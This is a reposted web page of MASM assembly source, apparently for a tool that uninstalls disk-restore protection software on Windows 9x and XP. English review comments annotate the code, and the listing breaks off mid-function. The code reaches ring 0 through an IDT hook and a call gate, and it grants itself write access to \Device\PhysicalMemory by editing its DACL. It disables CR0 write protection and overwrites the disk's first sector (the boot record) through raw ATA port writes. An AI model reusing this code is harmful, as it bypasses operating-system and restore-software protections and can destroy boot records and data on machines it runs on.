天龙还原精灵卸载器源代码 (2)
2008-02-10 13:05:39  作者:  来源:互联网  浏览次数:2  文字大小:【】【】【
  •   天龙还原精灵卸载器1.0 for win9x.386P.MODEL FLAT, STDCALL &#59; with STDCALL we must reverse the sequence of pushes option casemap :none &#59; case sensitiveinclude \masm32\include\windows. ...
59; Clear interupts

 mov dx, word ptr [ebx+6]  &#59; Save the current gate highword
 shl edx, 16d
 mov dx, word ptr [ebx]  &#59; lowword
 mov [lpOldGate], edx

 mov eax,  Ring0  &#59; "install hook" - that is newgate
 mov word ptr [ebx], ax  &#59; lowword
 shr eax, 16d
 mov word ptr [ebx+6], ax  &#59; highword

 int  ExceptionUsed   &#59; cause exception

 mov ebx, dword ptr [IDT+2]  &#59; restore gate
 add ebx, 8*ExceptionUsed
 mov edx, [lpOldGate]
 mov word ptr [ebx], dx
 shr edx, 16d
 mov word ptr [ebx+6], dx
 ret
ToRing0Code endp
end start

 

--------------------------------------------------------------------------------


;for winxp
; ---------------------------------------------------------------------
; Second listing on this page: the Windows XP variant (MASM32, 32-bit
; flat model, STDCALL). The listing cut off above ("ToRing0Code endp /
; end start") is the Win9x variant.
; .686p: the "p" enables the privileged instructions (mov cr0, cli) used
; by the ENTERRING0/LEAVERING0 macros further down.
; option casemap:none makes symbols case-sensitive, so the oddly cased
; names below (INVALID_HANDLE_value, PSECURITY_DEscriptOR) are distinct
; from any differently cased symbol that windows.inc may define.
; ---------------------------------------------------------------------
.686p
.model flat, stdcall
option casemap :none   ; case sensitive
; #########################################################################
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\advapi32.inc

includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\advapi32.lib
DEBUG = TRUE                ; build flag; no use of it is visible on this page
ShowError proto :DWORD      ; error-reporting helper, one DWORD argument; body not on this page

; Constant definitions (Win32 / NT values spelled out by hand; most of
; these presumably also come from windows.inc and are kept as the author
; wrote them).
NULL  = 0
MB_OK = 0
INVALID_HANDLE_value = -1               ; casing differs from INVALID_HANDLE_VALUE; under
                                        ; option casemap:none that makes it a separate symbol
GENERIC_READ  = 80000000H
GENERIC_WRITE = 40000000H
FILE_SHARE_READ   = 1
FILE_SHARE_WRITE  = 2
FILE_SHARE_DELETE = 4
OPEN_EXISTING   = 3                     ; CreateFile parameters (the caller is not on this page)

HMODULE typedef dword
NTSTATUS typedef dword
PACL typedef dword                      ; pointers are plain 32-bit values in the flat model
PSECURITY_DEscriptOR typedef dword      ; the odd casing is used consistently on this page (see the
                                        ; pSD local further down); it looks like an artifact of the
                                        ; hosting site rewriting the substring "SCRIPT", so keep it

; OBJECT_ATTRIBUTES.Attributes bits (ntdef.h names).
OBJ_INHERIT=2
OBJ_PERMANENT=10h
OBJ_EXCLUSIVE=20h
OBJ_CASE_INSENSITIVE=40h
OBJ_OPENIF=80h
OBJ_OPENLINK =100h
OBJ_KERNEL_HANDLE=200                   ; NOTE(review): this is decimal 200 (0C8h). ntdef.h defines it
                                        ; as 200h, and OBJ_VALID_ATTRIBUTES below (3F2h) contains bit
                                        ; 200h, not 0C8h. Not referenced in the code visible here.
OBJ_VALID_ATTRIBUTES=3F2h

; accctrl.h enumerations used with GetSecurityInfo / SetEntriesInAcl.
SE_KERNEL_OBJECT = 6                    ; SE_OBJECT_TYPE: the handle is a kernel object (a section here)
GRANT_ACCESS =1                         ; ACCESS_MODE
NO_INHERITANCE =0                       ; ACE inheritance flags
TRUSTEE_IS_NAME=1                       ; TRUSTEE_FORM: ptstrName holds an account name string
TRUSTEE_IS_USER=1                       ; TRUSTEE_TYPE
STATUS_SUCCESS =0
STATUS_ACCESS_DENIED =0C0000022h

STATUS_ACCESS_VIOLATION equ 0C0000005h
STATUS_INFO_LENGTH_MISMATCH equ 0C0000004h
SystemModuleInformation               equ 11  ; SYSTEM_INFORMATION_CLASS value; its consumer is not on this page
PVOID  TYPEDEF DWORD
UNLONG TYPEDEF DWORD                    ; sic -- presumably meant ULONG; kept as written
CHAR   TYPEDEF BYTE

; Native UNICODE_STRING (8 bytes in 32-bit): byte length in use, bytes
; allocated, pointer to UTF-16 text. NT does not require the text to be
; NUL-terminated, and the UNICODE_STR macro in this file emits none.
; The first field is named nLength rather than Length, presumably to
; avoid clashing with the MASM LENGTH operator.
UNICODE_STRING struct
   nLength word ?               ; bytes in use
   MaximumLength word ?         ; bytes available in Buffer
   Buffer dword ?               ; PWSTR
UNICODE_STRING ends

; Native OBJECT_ATTRIBUTES, 24 bytes in 32-bit -- this matches the
; "ObjAttr db 24 dup (0)" buffer declared in .data below.
OBJECT_ATTRIBUTES struct
   nLength dword ?              ; sizeof(OBJECT_ATTRIBUTES); named nLength to avoid the LENGTH operator
   RootDirectory HANDLE ?       ; 0 = ObjectName is a full object-manager path
   ObjectName dword ?           ; PUNICODE_STRING
   Attributes dword ?           ; OBJ_* bits defined above
   SecurityDescriptor dword ?   ; PVOID, points to a SECURITY_DESCRIPTOR
   SecurityQualityOfService dword ?   ; PVOID, points to a SECURITY_QUALITY_OF_SERVICE

OBJECT_ATTRIBUTES ends


; accctrl.h TRUSTEE (20 bytes in 32-bit). Only the TRUSTEE_IS_NAME /
; TRUSTEE_IS_USER form is used on this page (see the ea local further down).
TRUSTEE struct
    pMultipleTrustee dword ?            ; PTRUSTEE, 0 when unused
    MultipleTrusteeOperation dword ?    ; MULTIPLE_TRUSTEE_OPERATION
    TrusteeForm dword ?                 ; TRUSTEE_FORM: how ptstrName is interpreted
    TrusteeType dword ?                 ; TRUSTEE_TYPE
    ptstrName dword ?                   ; LPTSTR (account name when TrusteeForm = TRUSTEE_IS_NAME)
TRUSTEE ends


; accctrl.h EXPLICIT_ACCESS: one ACE to be merged into a DACL by
; SetEntriesInAcl (the merge call itself is past the end of this page).
EXPLICIT_ACCESS  struct
    grfAccessPermissions DWORD   ?      ; access mask being granted/denied
    grfAccessMode  dword ?              ; ACCESS_MODE (GRANT_ACCESS here)
    grfInheritance DWORD ?              ; NO_INHERITANCE here
    Trustee TRUSTEE  <>                 ; who the ACE applies to
EXPLICIT_ACCESS ends

; Gate descriptor (8-byte x86 GDT/IDT entry layout). The fields are the
; standard split of a 32-bit offset around the selector and type bytes;
; DCOUNT is the parameter-copy count of a call gate. How the descriptor
; is written into the GDT is not on this page (see GdtAddr / Callgt).
MyGATE     struct    ; gate structure type definition
    OFFSETL  WORD      ?  ; low 16 bits of the 32-bit offset
    SELECTOR WORd      ?  ; code segment selector
    DCOUNT   BYTE      ?  ; dword (parameter) count field
    GTYPE    BYTE      ?  ; type / present / DPL byte
    OFFSETH  WORD     ?  ; high 16 bits of the 32-bit offset
MyGATE     ends

; Prototypes. "Physcial" is misspelled consistently with the definition
; later in this file, so it must stay that way (case-sensitive symbols).
SetPhyscialMemorySectionCanBeWrited proto :dword   ; hSection -> grants SECTION_MAP_WRITE on the handle's DACL
MiniMmGetPhysicalAddress proto :dword              ; body not on this page

;-----------------------------------------------------------------------
; ENTERRING0 -- prologue for a routine entered at ring 0 through a call
; gate (paired with LEAVERING0, whose retf matches the far call).
; Saves all GPRs and EFLAGS, masks interrupts, then clears CR0.WP
; (bit 16) so that supervisor-mode writes to read-only pages are no
; longer trapped.
; Risk note: from here until LEAVERING0 the CPU runs with interrupts off
; and write protection disabled; any fault or spin in between hangs the
; machine. Clobbers eax (saved by the pushad, so invisible to the caller).
;-----------------------------------------------------------------------
ENTERRING0 macro
pushad 
pushfd
cli
mov eax,cr0   ; drop the read-only (WP) protection
and eax,0fffeffffh          ; clear bit 16 = CR0.WP
mov cr0,eax
endm

;-----------------------------------------------------------------------
; LEAVERING0 -- epilogue matching ENTERRING0: restores CR0.WP, then the
; saved EFLAGS and GPRs, and returns through the gate with a far return.
; The sti is redundant -- popfd restores IF from the EFLAGS image pushed
; by ENTERRING0 -- but harmless. Because of the retf, a routine using this
; pair must be reached by a far call (see Callgt in .data), never by a
; near call.
;-----------------------------------------------------------------------
LEAVERING0 macro
mov eax,cr0 ; restore the read-only (WP) protection
or eax,10000h               ; set bit 16 = CR0.WP
mov cr0,eax
sti
popfd
popad 
retf
endm


;-----------------------------------------------------------------------
; UNICODE_STR str -- emit the literal argument as UTF-16LE code units:
; each character followed by a zero byte (ASCII input assumed). No
; terminating NUL word is emitted; callers size the text with $ (see
; objnamestr_size).
; NOTE(review): the irpc argument list is missing in this copy -- the
; angle-bracketed parameter was most likely stripped as HTML when the
; page was posted; the use site "UNICODE_STR <\Device\PhysicalMemory>"
; shows the intended form. The curly quotes around &_c are also an
; extraction artifact; MASM needs ASCII quotes.
;-----------------------------------------------------------------------
UNICODE_STR macro str
irpc _c,
db ’&_c’        ; character code (& expands the irpc variable inside the string)
db 0            ; high byte of the UTF-16 code unit
endm
endm

.data?
; Uninitialised data.
GdtLimit dw ?               ; 6-byte pseudo-descriptor layout: 16-bit limit ...
GdtAddr dd ?                ; ... followed by 32-bit base; presumably the target of an sgdt elsewhere -- TODO confirm

mapAddr dd ?                ; presumably the address of the mapped \Device\PhysicalMemory view -- TODO confirm
OldEsp dd ?                 ; saved stack pointer; its user is not on this page

readed  dw ?                ; sic; a dword twin (readed1) is declared in .data


Buffer  db 512 dup(?)       ; one disk sector; _Ring0Proc streams exactly these 512 bytes to the drive
.data
; Initialised data. The curly quotes in the string literals below are an
; extraction artifact; MASM needs ASCII quotes.
 FileName db ’\\.\PHYSICALDRIVE0’,0     ; raw device path of the first physical disk (opened into hFile)
 align 4    ; dword alignment
 readed1 dd 0                           ; bytes-read counter; presumably for ReadFile -- TODO confirm
 
 hFile dd 0                             ; handle to the device named by FileName
 
 
 ErrCreate db ’请在NT下运行该程序!’,0         ; "Please run this program under NT!"
 ErrRead  db ’读盘错误!’,0                 ; "Disk read error!"
 


align 4
; Hand-laid UNICODE_STRING for the object name that follows:
;   objname    = Length (bytes), MaximumLength (Length + 2)
;   objnameptr = Buffer pointer; 0 at assembly time, presumably set to
;                offset objnamestr at run time (not visible on this page)
objname dw objnamestr_size,objnamestr_size+2
objnameptr dd 0
objnamestr equ this byte
UNICODE_STR <\Device\PhysicalMemory>    ; UTF-16LE text, no terminator (see the macro)
objnamestr_size equ $-objnamestr        ; byte length of the UTF-16 text

align 4
ObjAttr db 24 dup (0)                   ; OBJECT_ATTRIBUTES (24 bytes in 32-bit), zero-filled
IsIdtFlag dd 0
Callgt dq 0        ; call gate's sel:off -- 48-bit far pointer for the far call into _Ring0Proc (the call is not on this page)
Caption  db ’天龙还原精灵卸载器2.0 FOR:WINXP’,0     ; message-box caption ("... Uninstaller 2.0 FOR:WINXP")
ShowText db ’该程序用来卸载还原类软件 by:风般的男人(www.lsky.net www.hacksoft.com)’,0   ; message-box text ("This program uninstalls restore-type software by: ...")
.code
;-----------------------------------------------------------------------
; _Ring0Proc -- body executed at ring 0 through the call gate (Callgt).
; Entered by a far call, so ENTERRING0/LEAVERING0 supply the pushad/pushfd
; and the retf; there is no stack frame and no C-callable interface.
; Effect: programs the primary ATA channel (I/O base 1F0h) by direct port
; I/O to write the 512 bytes at Buffer to drive 0 at CHS cylinder 0 /
; head 0 / sector 1. CHS sector numbers start at 1, so that is the first
; physical sector of the disk (the boot-sector/MBR location), not
; "sector two" as the original comment below says.
; Risk notes (reviewer): the write bypasses the file system and the whole
; driver/filter stack; interrupts are off for the entire routine; only the
; DRQ bit is polled -- BSY and ERR are never checked and there is no
; timeout, so a device that never asserts DRQ leaves the machine hung with
; interrupts disabled. Any access to \Device\PhysicalMemory from user mode
; (the route by which this code reaches ring 0) is itself a strong
; detection signal; later Windows versions removed that access.
; Clobbers: nothing visible to the caller (ENTERRING0 saves all GPRs and
; flags); the drive contents are changed.
;-----------------------------------------------------------------------
_Ring0Proc PROC    ; Ring0 code here..
 ENTERRING0
 mov     dx,1f6h         ; drive/head register

mov     al,0a0h         ; drive 0, head 0 (bit 6 clear = CHS addressing)
 out     dx,al
 
 mov     dx,1f2h         ; sector count register
 mov     al,1            ; write one sector
 out     dx,al
 
 mov     dx,1f3h         ; sector number register
 mov     al,1            ; sector 1 = first sector (original comment said "sector two"; CHS numbering is 1-based)
 out     dx,al
 
 mov     dx,1f4h         ; cylinder low register
 mov     al,0            ; cylinder 0
 out     dx,al
 
 mov     dx,1f5h         ; cylinder high register
 mov     al,0            ; the rest of cylinder 0
 out     dx,al
 
 mov     dx,1f7h         ; command register
 mov     al,30h          ; WRITE SECTOR(S) with retry
 out     dx,al
oogle:
 in      al,dx           ; reading the same port gives the status register
 test    al,8            ; bit 3 = DRQ: wait for the sector buffer to be ready
 jz      oogle           ; NOTE: no timeout; BSY/ERR are not examined
 xor ecx,ecx
 mov     cx,512/2        ; 256 words = one 512-byte sector
 mov     esi,offset Buffer   ; ds:esi -> Buffer (user-mode data, same address space, so reachable here)
 mov     dx,1f0h         ; data register
        rep outsw        ; stream the sector to the drive
 LEAVERING0              ; restore CR0.WP, EFLAGS and GPRs; retf back through the gate
_Ring0Proc ENDP
Ring0CodeLen=$-_Ring0Proc   ; byte length of _Ring0Proc; presumably used to size a copy of the routine -- its consumer is not on this page


SetPhyscialMemorySectionCanBeWrited proc uses ebx esi edi hSection:HANDLE
local pDacl: PACL
local pNewDacl:PACL
local pSD :PSECURITY_DEscriptOR
local dwRes:DWORD &#59;
local ea:EXPLICIT_ACCESS &#59;
invoke GetSecurityInfo,hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,\
                  NULL,NULL, addr pDacl,NULL, addr pSD
cmp eax,ERROR_SUCCESS
jz @f
jmp OutSet
@@:
mov dwRes,eax
mov ea.grfAccessPermissions ,SECTION_MAP_WRITE&#59;2
mov ea.grfAccessMode ,GRANT_ACCESS&#59;1
mov ea.grfInheritance,NO_INHERITANCE&#59;0
mov ea.Trustee.pMultipleTrustee,0
mov ea.Trustee.MultipleTrusteeOperation,0

mov ea.Trustee.TrusteeForm,TRUSTEE_IS_NAME&#59;1
mov ea.Trustee.TrusteeType,TRUSTEE_IS_USER&#59;1
call @f
db "CURRENT_USER",0
@@:
